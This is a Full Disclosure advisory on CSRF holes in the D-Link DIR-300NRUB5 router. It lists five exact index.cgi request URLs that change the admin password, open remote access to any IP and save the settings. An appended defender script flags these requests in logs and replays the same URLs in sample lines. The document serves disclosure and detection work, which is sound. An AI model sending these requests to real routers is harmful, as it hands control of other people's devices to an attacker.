Full Disclosure mailing list archives
CSRF vulnerabilities in D-Link DIR-300
From: "MustLive" <mustlive () websecurity com ua>
Date: Fri, 13 Jul 2018 23:52:42 +0300
Hello list!

There are new Cross-Site Request Forgery vulnerabilities in D-Link DIR-300, after my previous advisory.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DIR-300NRUB5, Firmware 1.2.94. All previous versions also must be vulnerable.

----------
Details:
----------

After previous AoF, BF and CSRF vulnerabilities, here are new Cross-Site Request Forgery holes.

To take control over the device it's needed to make a few CSRF requests: change admin's password, login is fixed (this is the earlier mentioned AoF vulnerability), turn on remote access and save settings.

Cross-Site Request Forgery (WASC-09):

Change admin's password:

http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

Add settings to turn on remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1

Change current settings to turn on remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1

Delete settings of remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1

Save all changes in settings of device:

http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y

------------
Timeline:
------------

2016.03.17 - announced at my site about vulnerabilities in DIR-300.
2016.08.27 - disclosed at my site previous advisory about DIR-300.
2017.09.30 - disclosed this advisory (http://websecurity.com.ua/8165/).
2014-2018 - informed developers about multiple vulnerabilities in this and other D-Link devices.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
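A defender-side detection example, added here and not part of MustLive's advisory or of any D-Link code: it classifies requests to the DIR-300 `index.cgi` endpoint by the parameter combinations the advisory lists (`res_config_id=69` with `res_config_action=3` for the password change, `res_config_id=16` for the remote-access entry, `res_cmd=20` for the save), flags state-changing requests whose Referer is missing or comes from a host other than the router, and reports clients for which the full takeover sequence (password change, remote access opened to any IP, settings saved) was observed cross-site. The log format (`<client> <method> <url> referer=<value>`), the router address `192.168.0.1`, the category labels and the sample log lines are all constructed assumptions for the example; a real deployment would read the access log of a proxy or of the router itself.

```python
"""Constructed example: flag DIR-300 index.cgi configuration changes that look
cross-site (no Referer, or a Referer from a host other than the router).
Not from the advisory; parameter meanings follow the URLs the advisory lists."""
import json
from urllib.parse import parse_qs, urlsplit

ROUTER_HOST = "192.168.0.1"  # assumption: the router's LAN address


def classify(url):
    """Map an index.cgi request URL to one of the advisory's config actions,
    or None if it is not one of the state-changing requests listed there."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.cgi"):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)

    def get(key):
        return q.get(key, [""])[0]

    if get("res_cmd") == "20":                      # "save all changes" request
        return "save-config"
    action, cfg_id = get("res_config_action"), get("res_config_id")
    if action == "3" and cfg_id == "69":            # admin password change
        return "admin-password-change"
    if cfg_id == "16":                              # remote-access entry
        if action == "2":
            return "remote-access-delete"
        if action == "3":
            try:
                buf = json.loads(get("res_buf"))    # %22 is decoded to '"' by parse_qs
            except ValueError:
                return "remote-access-modify"
            if buf.get("ips") == "0.0.0.0" and buf.get("source_mask") == "0.0.0.0":
                return "remote-access-enable-any-ip"
            return "remote-access-modify"
    return None


def is_cross_site(referer):
    """A config change with no Referer, or one from another host, is consistent
    with a CSRF attempt (a hand-typed URL looks the same; the point is to review it)."""
    if not referer or referer == "-":
        return True
    return urlsplit(referer).hostname != ROUTER_HOST


def analyze(log_lines):
    """Return (client, action, cross_site) for every matching request."""
    findings = []
    for line in log_lines:
        client, _method, url, ref_field = line.split(" ", 3)
        referer = ref_field[len("referer="):]
        kind = classify(url)
        if kind is not None:
            findings.append((client, kind, is_cross_site(referer)))
    return findings


def takeover_chains(findings):
    """Clients that performed the advisory's full sequence cross-site."""
    needed = {"admin-password-change", "remote-access-enable-any-ip", "save-config"}
    per_client = {}
    for client, kind, cross in findings:
        if cross:
            per_client.setdefault(client, set()).add(kind)
    return sorted(c for c, kinds in per_client.items() if needed <= kinds)


# Constructed sample log: one victim browser (192.168.0.20) lured to an attacker page,
# one legitimate admin session (192.168.0.15) working from the router's own UI.
SAMPLE_LOG = [
    "192.168.0.20 GET http://192.168.0.1/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password| referer=http://attacker.example/lure.html",
    "192.168.0.20 GET http://192.168.0.1/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1 referer=-",
    "192.168.0.20 GET http://192.168.0.1/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y referer=http://attacker.example/lure.html",
    "192.168.0.15 GET http://192.168.0.1/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y referer=http://192.168.0.1/index.html",
    "192.168.0.15 GET http://192.168.0.1/index.html referer=-",
]

if __name__ == "__main__":
    for client, kind, cross in analyze(SAMPLE_LOG):
        print(f"{client:15} {kind:30} cross-site={cross}")
    print("takeover chains:", takeover_chains(analyze(SAMPLE_LOG)))
```

The Referer check is a heuristic, not proof: browsers may strip the header, and an administrator pasting a URL into the address bar also sends none. What it gives a defender is a short list of password, remote-access and save requests to review, and the chain check narrows that to clients where all three occurred together.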
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/